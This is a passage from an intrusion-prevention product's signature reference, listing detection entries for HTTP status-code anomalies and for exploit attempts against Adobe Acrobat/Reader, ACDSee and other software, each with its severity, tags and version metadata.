Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Security-Management-Center-Failed-Login

About this situation: A brute-force attack against Security Management Server was detected
Context: HTTP Status Line
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1253-5242
Vulnerability: Security-Management-Center-Failed-Login
Description:
Back to top

HTTP_SLS-See-Other-Status-Code

About this situation: Detected a see other status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-See-Other-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a see other status code in HTTP version 1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Service-Unavailable-Status-Code

About this situation: Detected a service unavailable status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Server Traffic
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-1697-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_SLS-Squid-Proxy-Invalid-HTTP-Response-Status-Code-DOS

About this situation: Denial of service attack against Squid detected
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-235-3038
Last changed: sgpkg-ips-235-3038
Vulnerability: HTTP-Squid-Proxy-Invalid-HTTP-Response-Status-Code-DOS
Description:
Back to top

HTTP_SLS-Successful-Status-Code

About this situation: Detected successful status code from HTTP server
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-571-5211
Description:
Back to top

HTTP_SLS-Suspicious-File-Transfer

About this situation: Detected the transfer of a suspicious file
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-865-5242
Last changed: sgpkg-ips-865-5242
Description:
Back to top

HTTP_SLS-Suspicious-Permanent-Site-Move

About this situation: Detected a suspicious permanent site move
Context: HTTP Status Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-979-5242
Last changed: sgpkg-ips-979-5242
Description:
Back to top

HTTP_SLS-Suspicious-Temporary-Site-Move

About this situation: Detected a suspicious temporary site move
Context: HTTP Status Line
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-979-5242
Last changed: sgpkg-ips-979-5242
Description:
Back to top

HTTP_SLS-Switching-Protocols-Status-Code

About this situation: Detected a switching protocols status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-521-5211
Description:
Back to top

HTTP_SLS-Switching-Protocols-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a switching protocols status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Temporary-Redirect-Status-Code

About this situation: Detected a temporary redirect status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Temporary-Redirect-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a temporary redirect status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Too-Many-Requests-Code

About this situation: Detected a too many requests status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-721-5211
Description:
Back to top

HTTP_SLS-Too-Many-Requests-Code-In-HTTP-1.0-Response

About this situation: Detected a too many requests status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-721-5211
Last changed: sgpkg-ips-721-5211
Description:
Back to top

HTTP_SLS-Unauthorized-Status-Code

About this situation: Detected an unautorized status code in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Failed Login, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1342-5242
Vulnerability: HTTP-Failed-Authentication
Description:
Back to top

HTTP_SLS-Uncommon-Status-Code-999

About this situation: Detected an uncommon status code 999 in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1108-5242
Description:
Back to top

HTTP_SLS-Unknown-Client-Error-Status-Code

About this situation: Detected an unknown client error class status in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Unknown-Informal-Status-Code

About this situation: Detected an unknown informal class status in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Unknown-Redirection-Status-Code

About this situation: Detected an unknown redirection class status in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Unknown-Server-Error-Status-Code

About this situation: Detected an unknown server error class status in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Unknown-Status-Code

About this situation: Detected an unknown status code in HTTP response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-1108-5242
Description:
Back to top

HTTP_SLS-Unknown-Success-Status-Code

About this situation: Detected an unknown success class status in HTTP response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Unprocessable-Entity-Status-Code

About this situation: Detected an unprocessable entity status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Unprocessable-Entity-Status-Code-In-HTTP-1.0-Response

About this situation: Detected an unprocessable entity status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Unsupported-Media-Type-Status-Code

About this situation: Detected an unsupported media type status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Unsupported-Media-Type-Status-Code-In-HTTP-1.0-Response

About this situation: Detected an unsupported media type status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-URI-Too-Large-Status-Code

About this situation: Detected a request URI too large status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-URI-Too-Large-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a request URI too large status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Use-Proxy-Status-Code

About this situation: Detected a use proxy status code in HTTP/1.1 response
Context: HTTP Status Line
Severity: 1
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Information, TCP Server Traffic
First detected in: sgpkg-ips-201-2032
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Use-Proxy-Status-Code-In-HTTP-1.0-Response

About this situation: Detected a use proxy status code in HTTP/1.0 response
Context: HTTP Status Line
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP server, Any Operating System not specific, Generic HTTP server not specific, Protocol Violations, Anomalies, TCP Server Traffic
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Description:
Back to top

HTTP_SLS-Vundo-Traffic

About this situation: Vundo traffic detected
Context: HTTP Status Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-619-5211
Vulnerability: Vundo
Description:
Back to top

HTTP_SOAP-URL

About this situation: HTTP SOAP Action URL
Context: HTTP without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: An HTTP SOAP action was detected. Risk analysis: Risk level is none. Seeing an HTTP SOAP action is not a signal of an attack. This is an informative message configured to be reported in the HTTP protocol agent parameters ('Logging of accessed URLs').
Back to top

HTTP_SOAP_Without_POST

About this situation: HTTP SOAP action without POST
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: A SOAP action was given with other method than POST. Risk analysis: Risk level is low.
Back to top

HTTP_Sophos-Anti-Virus-CHM-File-Heap-Overflow

About this situation: Malicious compressed help file detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sophos Anti-Virus, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Sophos-Anti-Virus-CHM-File-Heap-Oveflow
Description:
Back to top

HTTP_SS-ACDSee-XBM-Header-Name-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in ACDSee detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, ACDSee, ACDSee Photo Editor, Windows not specific, ACDSee not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-274-4219
Last changed: sgpkg-ips-274-4219
Vulnerability: ACDSee-XBM-Header-Name-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow

About this situation: A malicious PDF file targeted to exploit an integer overflow vulnerability in Adobe Acrobat and Adobe Reader products over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-261-3038
Vulnerability: Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow-2

About this situation: A malicious PDF file targeted to exploit an integer overflow vulnerability in Adobe Acrobat and Adobe Reader products over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-401-4219
Last changed: sgpkg-ips-401-4219
Vulnerability: Adobe-Acrobat-And-Adobe-Reader-Deflate-Parameter-Integer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-And-Adobe-Reader-Plugin-Object-Reloading-Memory-Corruption

About this situation: An attempt to exploit a memory corruption vulnerability in the Adobe PDF plugin for Firefox web browser detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-261-3038
Last changed: sgpkg-ips-261-3038
Vulnerability: Adobe-Acrobat-And-Adobe-Reader-Plugin-Object-Reloading-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Systems Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-378-4219
Vulnerability: Adobe-Acrobat-And-Reader-Font-Parsing-Integer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Cooltype-Sing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-393-4219
Last changed: sgpkg-ips-733-5211
Vulnerability: Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-373-4219
Vulnerability: Adobe-Acrobat-Cooltype-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-CustomDictionaryOpen-BOF

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Unix, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Unix not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-221-3038
Last changed: sgpkg-ips-221-3038
Vulnerability: Adobe-Reader-JavaScript-Spell.customDictionaryOpen-Method-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-209-2032
Last changed: sgpkg-ips-225-3038
Vulnerability: Adobe-Acrobat--Embedded-JBIG2-Stream-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Embedded-JBIG2-Stream-Buffer-Overflow-2

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-210-2032
Last changed: sgpkg-ips-210-2032
Vulnerability: Adobe-Acrobat--Embedded-JBIG2-Stream-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Flatedecode-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-251-3038
Last changed: sgpkg-ips-251-3038
Vulnerability: Adobe-Acrobat-Flatedecode-Integer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Font-Processing-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2008, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-210-2032
Last changed: sgpkg-ips-218-3038
Vulnerability: Adobe-Acrobat-PDF-Font-Processing-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Acrobat-GetAnnots-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-219-3038
Last changed: sgpkg-ips-219-3038
Vulnerability: Adobe-Acrobat-JavaScript-GetAnnots-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Professional detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-252-3038
Last changed: sgpkg-ips-253-3038
Vulnerability: Adobe-Acrobat-JavaScript-GetIcon-Method-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-JPXDecode-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-278-4219
Last changed: sgpkg-ips-278-4219
Vulnerability: Adobe-Acrobat-JPXDecode-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Media-Newplayer-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-272-4219
Vulnerability: Adobe-Acrobat-Media-Newplayer-Code-Execution
Description:
Back to top

HTTP_SS-Adobe-Acrobat-PDF-Formatstring

About this situation: Detected possible attempt to exploit Adobe pdf reader format strings vulnerability
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Acrobat, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-185-2032
Last changed: sgpkg-ips-189-2032
Vulnerability: HTTP-Adobe-Acrobat-PDF-BOF
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2010, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-373-4219
Last changed: sgpkg-ips-373-4219
Vulnerability: Adobe-Acrobat-Reader-ICC-MLUC-Integer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution

About this situation: An attempt to exploit a vulnerability in Adobe Reader detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Reader, CVE2009, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-381-4219
Last changed: sgpkg-ips-381-4219
Vulnerability: Adobe-Acrobat-Reader-U3D-CLODMeshContinuation-Code-Execution
Description:
Back to top

HTTP_SS-Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption

About this situation: A malicious PDF file targeted to exploit a memory corruption vulnerability in Adobe Acrobat Reader and Acrobat Professional products over HTTP detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-263-3038
Last changed: sgpkg-ips-263-3038
Vulnerability: Adobe-Acrobat-Reader-U3D-CLODMeshDeclaration-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Acropdf-ActiveX-Control-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Adobe Acrobat Professional detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Acrobat, CVE2006, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-357-4219
Last changed: sgpkg-ips-431-4219
Vulnerability: Adobe-Acropdf-ActiveX-Control-Memory-Corruption
Description:
Back to top

HTTP_SS-Adobe-Audition-Session-File-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Audition detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Audition, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Vulnerability: Adobe-Audition-Session-File-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Audition detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Audition, CVE2011, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-394-4219
Last changed: sgpkg-ips-394-4219
Vulnerability: Adobe-Audition-Session-File-TRKM-Stack-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-authplay.dll-CVE-2010-1297-Exploit

About this situation: A malicious PDF file targeting CVE-2010-1297 over HTTP detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-311-4219
Last changed: sgpkg-ips-311-4219
Vulnerability: Adobe-authplay.dll-Code-Execution-CVE-2010-1297
Description:
Back to top

HTTP_SS-Adobe-authplay.dll-CVE-2010-1297-Exploit-2

About this situation: A malicious SWF file targeting CVE-2010-1297 over HTTP detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Adobe Reader, Adobe Acrobat, CVE2010, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-315-4219
Last changed: sgpkg-ips-315-4219
Vulnerability: Adobe-authplay.dll-Code-Execution-CVE-2010-1297
Description:
Back to top

HTTP_SS-Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Adobe Download Manager detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Reader, Adobe Acrobat, CVE2009, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-354-4219
Vulnerability: Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow
Description:
Back to top

HTTP_SS-Adobe-Flash-ActiveX-Buffer-Overflow

About this situation: Attempt to access vulnerabile ActiveX component
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Adobe Flash Player, CVE2002, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-419-4219
